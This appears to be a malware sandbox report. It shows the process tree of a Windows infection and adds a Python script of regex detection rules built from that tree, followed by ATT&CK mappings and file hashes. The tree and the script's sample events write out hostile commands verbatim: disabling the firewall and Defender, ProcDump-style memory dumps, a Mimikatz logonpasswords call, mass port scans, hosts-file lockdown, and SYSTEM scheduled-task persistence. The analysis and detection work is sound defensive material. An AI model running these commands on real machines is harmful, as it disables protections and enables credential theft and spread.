[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
PID:2524
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
PID:208
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
PID:3852
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static set policy name=Bastards assign=y
PID:380
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
PID:2812
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
PID:2356
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 804 C:\Windows\TEMP\mqgbuygyl\804.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:372
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
PID:992
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static set policy name=Bastards assign=y
PID:3572
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
PID:3880
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
PID:4340
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
PID:4804
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 392 C:\Windows\TEMP\mqgbuygyl\392.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static set policy name=Bastards assign=y
PID:3772
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c net stop SharedAccess
PID:4868
-
[depth 3] C:\Windows\SysWOW64\net.exe
  cmdline: net stop SharedAccess
PID:5036
-
[depth 4] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop SharedAccess
PID:116
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c netsh firewall set opmode mode=disable
PID:3128
-
[depth 3] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh firewall set opmode mode=disable
- Modifies Windows Firewall
PID:3708
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c netsh Advfirewall set allprofiles state off
PID:1016
-
[depth 3] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh Advfirewall set allprofiles state off
- Modifies Windows Firewall
PID:3228
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c net stop MpsSvc
PID:2408
-
[depth 3] C:\Windows\SysWOW64\net.exe
  cmdline: net stop MpsSvc
PID:1500
-
[depth 4] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop MpsSvc
PID:3896
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c net stop WinDefend
PID:4240
-
[depth 3] C:\Windows\SysWOW64\net.exe
  cmdline: net stop WinDefend
PID:4948
-
[depth 4] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop WinDefend
PID:4412
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c net stop wuauserv
PID:2008
-
[depth 3] C:\Windows\SysWOW64\net.exe
  cmdline: net stop wuauserv
PID:2420
-
[depth 4] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop wuauserv
PID:2464
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c sc config MpsSvc start= disabled
PID:4656
-
[depth 3] C:\Windows\SysWOW64\sc.exe
  cmdline: sc config MpsSvc start= disabled
- Launches sc.exe
PID:4068
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c sc config SharedAccess start= disabled
PID:4892
-
[depth 3] C:\Windows\SysWOW64\sc.exe
  cmdline: sc config SharedAccess start= disabled
- Launches sc.exe
PID:3996
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c sc config WinDefend start= disabled
PID:3852
-
[depth 3] C:\Windows\SysWOW64\sc.exe
  cmdline: sc config WinDefend start= disabled
- Launches sc.exe
PID:1576
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c sc config wuauserv start= disabled
PID:4544
-
[depth 3] C:\Windows\SysWOW64\sc.exe
  cmdline: sc config wuauserv start= disabled
- Launches sc.exe
PID:2304
-
[depth 2] C:\Windows\TEMP\xohudmc.exe
  cmdline: C:\Windows\TEMP\xohudmc.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4236
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 1732 C:\Windows\TEMP\mqgbuygyl\1732.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2504 C:\Windows\TEMP\mqgbuygyl\2504.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2652 C:\Windows\TEMP\mqgbuygyl\2652.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2704 C:\Windows\TEMP\mqgbuygyl\2704.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3168 C:\Windows\TEMP\mqgbuygyl\3168.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3796
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3748 C:\Windows\TEMP\mqgbuygyl\3748.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3868 C:\Windows\TEMP\mqgbuygyl\3868.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3948 C:\Windows\TEMP\mqgbuygyl\3948.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 4048 C:\Windows\TEMP\mqgbuygyl\4048.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 4012 C:\Windows\TEMP\mqgbuygyl\4012.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 4388 C:\Windows\TEMP\mqgbuygyl\4388.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:372
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3116 C:\Windows\TEMP\mqgbuygyl\3116.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3288 C:\Windows\TEMP\mqgbuygyl\3288.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2152 C:\Windows\TEMP\mqgbuygyl\2152.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd.exe /c C:\Windows\mqgbuygyl\thanliysa\scan.bat
PID:692
-
[depth 3] C:\Windows\mqgbuygyl\thanliysa\llnysaisr.exe
  cmdline: llnysaisr.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
- Executes dropped EXE
- Drops file in Windows directory
PID:1072
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 692 C:\Windows\TEMP\mqgbuygyl\692.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5384
-
[depth 2] C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe
  cmdline: C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2892 C:\Windows\TEMP\mqgbuygyl\2892.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
PID:1544
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:5100
-
[depth 3] C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
PID:4504
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:4676
-
[depth 3] C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
PID:4036
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:1888
-
[depth 3] C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
PID:564
-
[depth 1] C:\Windows\SysWOW64\hmhriy.exe
  cmdline: C:\Windows\SysWOW64\hmhriy.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3384
-
[depth 1] C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F
PID:3004
-
[depth 2] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:1536
-
[depth 2] C:\Windows\system32\cacls.exe
  cmdline: cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F
PID:4880
-
[depth 1] C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tlmneit.exe
PID:3936
-
[depth 2] C:\Windows\ime\tlmneit.exe
  cmdline: C:\Windows\ime\tlmneit.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:440
-
[depth 1] C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F
PID:4164
-
[depth 2] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:2420
-
[depth 2] C:\Windows\system32\cacls.exe
  cmdline: cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F
PID:712
-
[depth 1] C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tlmneit.exe
PID:4484
-
[depth 2] C:\Windows\ime\tlmneit.exe
  cmdline: C:\Windows\ime\tlmneit.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5544
-
[depth 1] C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F
PID:4268
-
[depth 2] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:5572
-
[depth 2] C:\Windows\system32\cacls.exe
  cmdline: cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F
PID:5128
-
[depth 1] C:\Windows\system32\cmd.EXE
  cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F
PID:1120
-
[depth 2] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:5576
-
[depth 2] C:\Windows\system32\cacls.exe
  cmdline: cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F
PID:2688
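The tree above is almost entirely command-line activity, which makes it a good source for process-creation detections: a ping-to-localhost delay before relaunching from C:\Windows\lqtiqntg, cacls denying users, administrators and SYSTEM on the hosts file, an IPsec policy that blocks inbound 135/139/445 once the host is owned, firewall and Defender/Update services stopped and disabled, every-minute SYSTEM tasks that relaunch the payload and reset it to everyone:F, one scanner with masscan-style arguments (-p 80 <range> --rate=512 -oJ) and one with a "TCP <start> <end> <port> <threads> /save" syntax, a dumper whose -accepteula -mp <pid> <file>.dmp arguments match ProcDump's (note that -mp 1732 targets spoolsv.exe in this tree), and the sekurlsa::logonpasswords invocation the Mimikatz signature fired on. The following is an added example, not part of this report: one regex rule per behaviour, run over events constructed in the shape of Sysmon Event ID 1 (ProcessId, Image, CommandLine) by copying entries from the tree, plus one benign-looking line to show a miss. The rule names are labels chosen here, not signature names from the report.

```python
"""Command-line detections for the behaviours recorded in the process tree above.

Added example, not part of the sandbox report. Each rule is a regular expression
over the process command line, written from the commands the tree shows. EVENTS
is constructed from the tree in Sysmon Event ID 1 shape: (ProcessId, Image, CommandLine).
"""
import re
from typing import Dict, List, Tuple

IP = r"\d{1,3}(?:\.\d{1,3}){3}"

RULES = [
    # cmd /c ping 127.0.0.1 -n 5 & Start <dropped exe>: sleep-then-relaunch idiom
    ("ping_delay_then_start",
     re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d+\s*&\s*start\b", re.I)),
    # cacls ...\drivers\etc\hosts /T /D users|administrators|SYSTEM: hosts file locked even against SYSTEM
    ("hosts_acl_lockdown",
     re.compile(r"cacls\s+\S*drivers\\etc\\hosts\b.*?/D\s+(?:users|administrators|SYSTEM)\b", re.I)),
    # netsh ipsec static add policy|filteraction|filter|rule: the "Bastards" block list for 135/139/445
    ("ipsec_block_policy",
     re.compile(r"netsh\s+ipsec\s+static\s+add\s+(?:policy|filteraction|filter|rule)\b", re.I)),
    ("firewall_disabled",
     re.compile(r"netsh\s+(?:advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
    # net stop / net1 stop / sc config against Defender, the firewall service, ICS and Windows Update
    ("defense_service_stopped",
     re.compile(r'(?:\bnet1?\s+stop|\bsc\s+config)\s+"?(?:WinDefend|MpsSvc|SharedAccess|wuauserv)\b', re.I)),
    # schtasks /create /sc minute /mo 1 ... /ru system: every-minute task as SYSTEM
    ("minute_task_as_system",
     re.compile(r"schtasks\s+/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/ru\s+system\b", re.I)),
    # -accepteula -mp <pid> <pid>.dmp: ProcDump-style MiniPlus dump of an arbitrary process
    ("procdump_style_memory_dump",
     re.compile(r"-accepteula\s+-mp\s+\d+\s+\S+\.dmp\b", re.I)),
    ("mimikatz_logonpasswords",
     re.compile(r"sekurlsa::logonpasswords", re.I)),
    # masscan-style "-p <port> <start>-<end> --rate=<n>" or "TCP <start> <end> <port> <threads> /save"
    ("mass_port_scan",
     re.compile(rf"(?:-p\s+\d+\s+{IP}-{IP}\s+--rate=\d+|\bTCP\s+{IP}\s+{IP}\s+\d+\s+\d+\s+/save\b)", re.I)),
    # cacls <exe> /p everyone:F: dropped payload made world-writable (re-applied by the tasks)
    ("world_writable_payload",
     re.compile(r"cacls\s+\S+\.exe\s+/p\s+everyone:F\b", re.I)),
]

# Constructed events copied from the tree; the last one is benign-looking and should not fire.
EVENTS: List[Tuple[int, str, str]] = [
    (4620, r"C:\Windows\SysWOW64\cmd.exe", r"cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lqtiqntg\tlmneit.exe"),
    (4412, r"C:\Windows\SysWOW64\cacls.exe", r"cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM"),
    (3352, r"C:\Windows\SysWOW64\netsh.exe", "netsh ipsec static add policy name=Bastards description=FuckingBastards"),
    (2524, r"C:\Windows\SysWOW64\netsh.exe",
     "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP"),
    (3708, r"C:\Windows\SysWOW64\netsh.exe", "netsh firewall set opmode mode=disable"),
    (3228, r"C:\Windows\SysWOW64\netsh.exe", "netsh Advfirewall set allprofiles state off"),
    (4948, r"C:\Windows\SysWOW64\net.exe", "net stop WinDefend"),
    (1576, r"C:\Windows\SysWOW64\sc.exe", "sc config WinDefend start= disabled"),
    (1556, r"C:\Windows\SysWOW64\schtasks.exe",
     r'schtasks /create /sc minute /mo 1 /tn "rtttegmpt" /ru system /tr "cmd /c C:\Windows\ime\tlmneit.exe"'),
    (372, r"C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe",
     r"C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 804 C:\Windows\TEMP\mqgbuygyl\804.dmp"),
    (4960, r"C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe",
     r"C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 1732 C:\Windows\TEMP\mqgbuygyl\1732.dmp"),
    (1096, r"C:\Windows\mqgbuygyl\Corporate\vfshost.exe",
     r"C:\Windows\mqgbuygyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit"),
    (1200, r"C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe",
     r"C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mqgbuygyl\thanliysa\Scant.txt"),
    (1072, r"C:\Windows\mqgbuygyl\thanliysa\llnysaisr.exe", "llnysaisr.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save"),
    (4880, r"C:\Windows\system32\cacls.exe", r"cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F"),
    (2528, r"C:\Windows\SysWOW64\net.exe", "net start npf"),
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events: List[Tuple[int, str, str]]) -> Dict[str, List[int]]:
    """Rule name -> PIDs whose command line matched, in event order."""
    hits: Dict[str, List[int]] = {}
    for pid, _image, cmdline in events:
        for name in classify(cmdline):
            hits.setdefault(name, []).append(pid)
    return hits


def looks_like_this_tree(hits: Dict[str, List[int]], min_rules: int = 4) -> bool:
    """Several distinct rule families on one host is the signal; a single family (e.g. only
    firewall_disabled, which admins also trigger) is weak on its own."""
    return len(hits) >= min_rules


if __name__ == "__main__":
    for rule, pids in triage(EVENTS).items():
        print("%-28s %s" % (rule, pids))
```

When this runs over real Sysmon or 4688 data, keep the rules per-host and per-window: every one of them fires here, which is what separates this tree from an administrator who disables the firewall once.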
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (1)
- Create or Modify System Process: Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (1)
- Create or Modify System Process: Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses: Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads
-
Filesize 95KB
MD5 86316be34481c1ed5b792169312673fd
SHA1 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize 275KB
MD5 4633b298d57014627831ccac89a2c50b
SHA1 e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256 b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize 693B
MD5 f2d396833af4aea7b9afde89593ca56e
SHA1 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256 d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize 4.2MB
MD5 ace786572753a8e4c91f03932bd6f623
SHA1 38f797a77d5cefa85e816214bcdb15d8885889eb
SHA256 08fa123da49a0f13ff8b8d4bbec639fc34e6748d51f1718c485d73fce0dabe8a
SHA512 b1837dae056d7c640223901bf71f7237016fec22797ddefc77955a639635ff3bea7e019cb27551e7f38d7ff523ffcf251559db03871f33480767d01f8e86bb37
-
Filesize 3.9MB
MD5 6e67907df91260f62641158da01dc569
SHA1 64d2834996376eb871159de085bcbd983b8334e2
SHA256 147c50c00348816b7e422e4e91e5e236ed7637b9f4d5e55f6c722b63d7d8eb8f
SHA512 de4fbd647afea3fe5ed4a24976d19f6bee77fea7a936cc0a3e9c42144cbfe30a9966d81e5d3f7faec2a20057ac6a10127f61a368853373fb02cb574ac2a918fc
-
Filesize 2.9MB
MD5 a6d7cc9a20cb815104ceba96f1cbc539
SHA1 75f422a5489a77a9fb078b9c75c941f12f170666
SHA256 58e92ff0220a7226c5ce1bd6e978cd0c8b3a173d514aad7e335b677917ab56cc
SHA512 e928dca68832bf5fab9a204b87935c57ea2629614648ae966e0cfcf63133cd1c04b6a20c735d5fffb165765a184f1d5eba22a6eee6e3d86a8b3df5dba9fb004f
-
Filesize 7.5MB
MD5 27e2353b362d7912cfc6c7d1702a6995
SHA1 91c35d285950cc5d1aa5fa03bca3fbe384175731
SHA256 1139d60ef7ccf14288e7cfb64ef7fbd673728543679d21d0ec0c92e5e6bdf47f
SHA512 6d00b0aa66fa132e5653e4848d6f32d304d5ca3a5bfd9c9a67c1db4a98bd9d1f100a95346bce3d1174d137066262bc827353ba6f5c8d33d013dd69efc4cb816a
-
Filesize 8.9MB
MD5 e097a9e2751b70f73edaad319fd8f6e9
SHA1 c4647f0ee577dac894985dc21d357a9cced696ed
SHA256 cad0e91136fd9c7c014ec02478719b4b1723f9bd22143f4bed3952d27dda0099
SHA512 0c8fa2c8d83fa06bf646dfe443cdb9ad60218805521614a5503eabd50000b035c31b229135dc8787f04111b35021777c54bb5af82e60f9b586dbb30657ce9671
-
Filesize 810KB
MD5 07cbae8ab1c42a9faf7487e81aa834c5
SHA1 d00e95eae0111713b8bd8f6e8f375989498cc3b5
SHA256 e859a32aad811964b492af67f78ea0ed940ad641ecac31cb3b44ba5c66be1ae2
SHA512 5be14bb3849c2c8840a7d3a6345b54acb792062c1d80b4bfc6fd7bede11a6de0a14127ec87d20ad49d26a65c58a44925dac7fca7108aaca3475aa9799943121f
-
Filesize 2.4MB
MD5 fc45d62adeb291cf81b7d03e63151710
SHA1 5c7add9a3633b173604f65aa84a7a5427d0d1e8f
SHA256 3ac6fac3c7a235a5e2a7150c9bfedd0e6a71c9dabec1cfbe129237704216aa4e
SHA512 7dd4c5e7d3932dbc463c5d17ed5dee879b9058e9db687208e2c6b83a75ef4950219c51a34ace3fffd35cefa52af34c209cc33fa86cd4ba11b2734e308c2314c6
-
Filesize 20.6MB
MD5 9a5891c9215d0c629f205660084d1d88
SHA1 3bdbae7756721aabb49d6aae982b9965a69f1ec5
SHA256 d10e0fb04d4b3e883a9f72b8d91deb7a96db3ad4f3de25beeb224fc04db7ab59
SHA512 d6e9e1a870b4ad8ba4b41a3d99ce5de784386688c99cb913bdb90c8068a75c5d3e9f3089871c8833d33016d367e399d3d91a48578062069b22df80622cfc8f6b
-
Filesize 33.2MB
MD5 7d0a57e8f73689434af92b1c95010cab
SHA1 5d510f810cdefdbbe17a9a3f37da4b85cc96f7c4
SHA256 c3bd8c268ba172ba4ece47611e1e3cab96a484b817c763d7e5b380002d9af9bb
SHA512 0ba2e9855636bff7065e0f51dadb801747f796c88703c9d580221e3e02ba33199f9ed226553770c19c64fa96e8014d69a341739de0b1fdd1815b853e3d2ef0a4
-
Filesize 4.3MB
MD5 abe3b9b71c906442fa924cbb62e3b85d
SHA1 ee1eff93e1e4e18fe37179324410c4ab752804d6
SHA256 b23157f65b1b4c98a7179be4483eb50a3d52dad797fbee5b9e030bb644c6b257
SHA512 20c8a7c0be3f7420b6d8f5dece6709024041dd110de821ef60d5c0690111241e9de2f44bc69dba8b56529428764e6cfd0f7c0836a6366cce3f5292d75d9b870d
-
Filesize 1.2MB
MD5 937878bd85145cb2ecf12ffd46fd4c42
SHA1 af27e6f9672b17d1dd59d250ab819fa7f2eace41
SHA256 1d911738888851f2d1dbba942e089ec72fb5ece52e4d7463b4277484f5ac03a1
SHA512 a846a88b235dfacb725adbee0212c211105de10cabe28ef0b8a9d0a7fdd7ac94a9bbd54027d9663aed211fb66ec5ca1fb69eb0798c0402e18d4445d762a51b97
-
Filesize 44.8MB
MD5 d63e81f018530d6534473c1ad732eb6e
SHA1 53ca0e5bed7ca7a24093d7b6d55e7dca042bcd82
SHA256 d0882e3a54dea629f070e0264fba1b2e2944c6d0a737d946a8851c4985b73963
SHA512 1152341f54622104a7e74548ce2c2bf8b5a720d7372e4395e7c3bd9bdf087283298d69a7f813e08bac5ff87a9cb1fd24b0dcbdd1a46fa1a71c65f16090bfa1af
-
Filesize 26.3MB
MD5 f210b5654eb92848ccfb7b1978fcfb23
SHA1 d6ed520e9a12ec0437e456d4a809177ee921fe31
SHA256 70a3c93049955af0c10be69bd2b8ddf9c840953540906dd42d2b1c6f7ae9b508
SHA512 f4afc4ce2bbe530617660824e79dc4f3df545d5412643c6d614569081871cea01baafdcf68d8586c39a55dad18d93a5a9889ba8f99888eb8fdcc0d3279e1c2cc
-
Filesize 1.9MB
MD5 64da852c0b7b5c782c7d753941395a3b
SHA1 64e48d90326b0a27e5bde1f5831b428648cc4e8e
SHA256 09f74fa4d1e53a14f1073857c9ca7e6de318338373f8fad9d1f52e38eec0f05e
SHA512 5de37bb6df9f9e5f76813e3c31281d3e18802f3e844a88f8b72e3521449f0b55e40630b95eb2a9e6c558d60188e78e41b2cd6318219508484ec227fb16f72b54
-
Filesize 343KB
MD5 2b4ac7b362261cb3f6f9583751708064
SHA1 b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256 a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
